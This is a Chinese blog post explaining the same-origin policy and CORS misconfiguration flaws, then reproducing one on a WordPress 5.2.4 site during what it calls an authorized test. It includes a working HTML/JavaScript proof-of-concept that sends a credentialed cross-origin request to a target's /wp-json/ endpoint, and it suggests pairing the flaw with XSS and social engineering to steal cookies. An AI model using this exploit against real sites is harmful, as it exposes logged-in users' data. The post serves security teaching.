CORS跨域漏洞简析

最新推荐文章于 2024-03-21 15:52:08 发布
最新推荐文章于 2024-03-21 15:52:08 发布
阅读量2k 收藏 3
点赞数
分类专栏: 漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alexz__/article/details/105592105
版权

1,什么是CORS

2,CORS漏洞简析及POC

3,基于wordpress5.2.4的CORS漏洞复现

 

 

 

壹   什么是CORS

想了解CORS先要搞清楚浏览器的同源策略

 

同源策略 (Same Origin Policy)

是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。

该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。

同源的定义:如果两个 URL 的 protocolport (如果有指定的话)和 host 都相同的话,则这两个 URL 是同源

虽然SOP同源策略是一个非常好的策略,但是随着web网站和HTML5的发展光使用SOP就会显得有些力不从心,于是便出现了CORS:

 

CORS,跨域资源共享(Cross-origin resource sharing)

是H5提供的一种机制,WEB应用程序可以通过在HTTP请求包增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。

使用CORS的一些场景:

  • 比如后端开发完一部分业务代码后,提供接口给前端用,在前后端分离的模式下,前后端的域名是不一致的,此时就会发生跨域访问的问题。
  • 程序员在本地做开发,本地的文件夹并不是在一个域下面,当一个文件需要发送ajax请求,请求另外一个页面的内容的时候,就会跨域。
  • 电商网站想通过用户浏览器加载第三方快递网站的物流信息。
  • 子站域名希望调用主站域名的用户资料接口,并将数据显示出来。

 

CORS漏洞攻击原理

  1. 假设用户登陆一个含有CORS错误配置网站vuln.com,同时又访问了攻击者提供的一个链接evil.com
  2. evil.com的网站向vuln.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于vuln.com的CORS配置。
  3. 如果vuln.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收;否则浏览器会因为同源策略而不接收。

 

CORS漏洞验证

这是一个正常的GET请求包:    

我们现在在该请求包上面添加一个origin参数:

可以看到,该请求包添加了oringin表头之后,返回包的数据中出现了对应的CORS响应头,Access-Control-Allow-Origin指是允许访问的源,Access-Control-Allow-Credentials指的是允许带上cookie访问资源,这样我们就可以通过POST获取到访问者的cookie信息。

 

 

 

叁   基于wordpress5.2.4的CORS漏洞复现

(此次渗透为漏洞银行众测项目,为授权渗透,但这里还是将其做保护隐私的打码处理)

某网站,url到手之后西安nmap攻击性扫描一下:

为wordpress 5.2.4版本,该版本存在CORS漏洞

漏洞存在测试成功;该漏洞存在于wordpress根目录下/wp-json/,该接口用于自定义方法从而获取网站数据,故我们利用此漏洞可以获取到网站数据:

构造本地弹窗测试POC:

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
    document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "https://www.xxxxx.net/wp-json/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>

返回了unicode编码的网站数据,这是从本地进行跳转访问

 

该漏洞主要利用还是要结合网站域名/子域名下的XSS漏洞,通过社工等方法可以轻易获取用户cookie或某站点漏洞的数据;

 

 

 

 

 

参考文章:

https://www.hack520.com/474.html

https://www.freebuf.com/articles/web/204023.html  高级的利用方法(结合xss)

https://www.freebuf.com/column/194652.html

http://blog.w3bsafe.cn/archives/126.html

https://blog.csdn.net/m0_38103658/article/details/102721402

 

Alexz__
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CORS资源共享漏洞的复现、分析、利用及修复过程
Innocence_0的博客
02-02 2908
CORS资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,
CORS资源共享)错误配置漏洞的高级利用
mingyqf的博客
11-14 1094
secist 2019-06-05 15:00:51 1077577 4 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 嗨,大家好!我是来自摩洛哥的安全研究员Ayoub。本文我将为大家介绍两种CORS错误配置漏洞利用的情况:第一种情况是基于XSS,第二种情况是基于高级的CORS利用技术。 注意:在开始阅读本文之前,你需要基本了解CORS是什么以及如何利用其错误配置漏洞。这里有一些很很不错的文章你可以参阅学习: Portswigger’s
资源共享CORS漏洞
热门推荐
LuckySec
08-22 1万+
0x01 漏洞简介 资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站读取受害网站的敏感信息。 这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击
Cors漏洞详解
Askshhbs的博客
04-26 9753
Cors介绍 Cors全称"资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
CORS 资源共享漏洞
最新发布
weixin_45653478的博客
03-21 1604
资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以获取数据。我们先来简单分析一下 CORS 获取资源的过程:CORS 定义了两种请求:简单请求 和 非简单请求。简单请求就是使用设定的请求方式请求数据,而非简单请求则是在使用设定的请求方式请求数据之前,先发送一个 OPTIONS 预检请求,验证请求源是否为服务端允许源。
【Web漏洞CORS资源共享漏洞
Butterfly0011的博客
03-12 4185
文章目录CORS资源共享简单请求非简单请求CORS的安全问题CORS漏洞的利用 有关于浏览器的同源策略和如何获取资源,传送门 -->浏览器同源策略和的实现方法 同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从...
CORS资源共享漏洞的原理与挖掘方法
seek_2022的博客
08-06 4128
本文介绍了CORS漏洞的原理、靶场搭建方法、漏洞挖掘方法、自动化扫描工具、及CORS漏洞的修复建议,希望对大家学习渗透测试有一定的帮助。
用于检测HTTP请求头缺失和CORS漏洞的工具
07-02
CORS(Cross-Origin Resource Sharing)资源共享是一种机制,允许浏览器从不同源(domain)获取资源。它是Web应用的安全策略之一,防止恶意网站通过脚本访问敏感数据。但CORS配置错误可能导致安全漏洞,如未授权...
你可能不知道的CORS资源共享
10-17
CORS资源共享)是Web开发中解决访问问题的一种机制,它允许浏览器在遵循同源策略的前提下,通过特定的HTTP头部与服务器通信,从而实现不同源之间的资源访问。这种机制是为了解决现代Web应用中由于同源策略...
cors问题对应的jar包.zip
08-19
在开发Web应用时,我们经常会遇到“”(CORS,Cross-Origin Resource Sharing)的问题。这是一种安全机制,由浏览器实施,旨在防止恶意网站通过脚本访问其他网站的数据,以保护用户信息安全。当一个请求的源...
CORS解决问题(403问题)
04-04
Tomcat lib目录下添加cors-filter-1.7.jar,java-property-utils-1.9.jar这两个jar包,项目中web.xml 中添加filter,以及出现OPTIONS 类型的请求并返回403的解决方案;压缩文件包含jar文件,以及web.xml配置。
详解Spring MVC CORS
08-30
详解 Spring MVC CORS 在 Web 开发中,资源共享(Cross-origin resource sharing,CORS)是一个非常重要的概念。它允许 Web 应用程序可以访问不同名下的资源,而不受同源策略的限制。今天,我们主要介绍...
corsTomcat文件
04-21
【标题】"corsTomcat文件"涉及的是在Web开发中解决问题的一种常见方法,即使用CORS(Cross-Origin Resource Sharing)机制在Apache Tomcat服务器上配置和实现。CORS是一种允许浏览器安全地从不同源加载资源...
修复Cors漏洞
压力是什么?
09-24 4385
修复Cors漏洞
利用不安全的源资源共享(CORS)---api.artsy.net
一个码农的笔记
09-17 4459
翻译自 https://bugbountypoc.com/exploiting-cross-origin-resource-sharing/ (这个网站会公开获得赏金的漏洞的poc,方法,思路) 译者:聂心明 利用不安全的源资源共享(CORS)– BugBountyPOC 这个文章的公开者是BugBountyPOC.Note的贡献者Muhammad Khizer Javed,这篇文章的作者...
CORS漏洞利用检测和利用方式
weixin_30245867的博客
07-21 5810
  CORS全称Cross-Origin Resource Sharing, 资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式:   1.curl访问网站     curl https://www.huasec.com -H "Origin: https://test.com" -I   检查返回包的 Access-C...
资源共享(CORS)-漏洞整理
weixin_30865427的博客
07-28 446
绕过方法整理 绕过 - 仅对名校验 #POC #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- Credentials: true". #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: ht...
cors漏洞概述
10-11
CORS来源资源共享)是一个用于浏览器和服务器之间通信的机制,它允许服务器在响应中添加一些响应头来明确指示哪些被允许访问该资源。由于同源策略的限制,浏览器通常不允许从一个源加载另一个源的资源,但如果服务器明确指定了某些可以访问该资源,浏览器就会允许请求。 然而,CORS 也存在一些安全风险。其中最常见的是 CORS 漏洞,攻击者可以利用这种漏洞来盗取用户数据或执行恶意脚本。攻击者可能会伪造一个请求,然后向服务器发送一个 HTTP 请求,服务器在响应中添加了允许其它名访问该资源的头部,攻击者就能够获取到服务器返回的数据。 为了防止 CORS 漏洞,服务器需要对来自非法名的请求进行严格检查,并且不要将敏感信息包含在响应中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值